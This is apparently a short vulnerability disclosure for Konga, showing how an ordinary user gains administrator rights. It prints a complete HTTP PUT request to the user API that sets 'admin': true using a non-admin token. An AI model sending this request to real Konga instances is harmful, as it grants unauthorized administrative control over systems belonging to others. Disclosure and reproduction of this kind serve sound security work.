Konga Vulnerability For Ordinary Users To Obtain Administrator Permissions Overstepping Their Rights
Konga Vulnerability For Ordinary Users To Obtain Administrator Permissions Overstepping Their Rights
Konga Vulnerability for ordinary users to obtain administrator permissions overstepping their rights
Vulnerability Description
Konga Ordinary users can obtain administrator permissions by sending special requests
Vulnerability Impact
Konga
Network surveying and mapping
“konga”
Vulnerability reappears
Login page
Log in and get token after creating a non-administrator user
Send the request packet and modify the token to the one you just obtained
PUT /api/user/7 HTTP/1.1
Host: 127.0.0.1:1337
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json;charset=utf-8
Content-Length: 241
{
"admin": true,
"passports": {
"password": "1234abcd",
"protocol": "local"
},
"password_confirmation": "1234abcd",
"token": "non-administrator user token"
}
Successfully converted to an administrator user
This post is licensed under CC BY 4.0 by the author.